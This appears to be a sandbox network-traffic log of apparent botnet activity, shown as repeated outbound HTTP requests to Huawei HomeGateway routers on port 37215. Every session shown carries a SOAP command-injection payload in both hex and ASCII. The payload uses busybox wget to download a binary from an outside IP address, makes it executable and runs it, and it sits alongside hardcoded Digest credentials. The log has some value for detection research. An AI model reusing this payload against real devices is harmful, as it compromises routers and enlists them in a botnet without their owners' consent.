2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            325192.168.2.1552948197.32.136.2037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.780716896 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            326192.168.2.1559110197.7.222.18737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.780716896 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            327192.168.2.1559436197.189.105.18337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.780723095 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            328192.168.2.1556012197.18.135.6937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.780760050 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            329192.168.2.1540196197.136.72.3737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.780783892 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            330192.168.2.1539584197.41.87.20437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.780813932 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            331192.168.2.1557560197.168.182.6537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.780844927 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            332192.168.2.1558122197.156.207.22037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.780863047 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            333192.168.2.1541358197.14.4.437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.780895948 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            334192.168.2.1547298197.102.119.16937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.780920029 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            335192.168.2.1560540197.135.65.4837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.780940056 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
